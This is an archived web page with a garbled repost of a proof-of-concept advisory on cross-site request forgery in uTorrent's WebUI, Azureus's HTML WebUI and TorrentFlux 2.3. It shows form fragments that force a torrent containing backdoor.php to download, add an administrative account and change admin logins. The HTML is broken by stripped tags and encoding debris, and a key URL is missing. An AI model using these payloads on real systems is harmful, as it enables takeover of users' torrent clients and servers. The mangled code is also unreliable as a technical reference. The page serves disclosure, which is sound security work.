AOH :: HP Unsorted B :: BX2867.HTM

BitTorrent Clients and CSRF
BitTorrent Clients and CSRF
BitTorrent Clients and CSRF

The following are proof of concept exploits against three bittorrent clients.  uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.

More information:

TorrentFlux v2.3(Latest)

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:
You do not have to know a password to access this folder, but you will have to know the username.

">action="http://localhost/torrentflux_2.3/html/index.php"> ">value="http://localhost/backdoor.php.torrent"> Add an admistrative account: action==94http://localhost/torrentflux_2.3/html/admin.php?op=addUser=94>
uTorrent=92s WebUI is also affected: force file download: utorrent change administrative login information: After the username or password have been changed then the browser must re-authenticate., So is Azurues=92s HTML WebUI: Force file download:

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to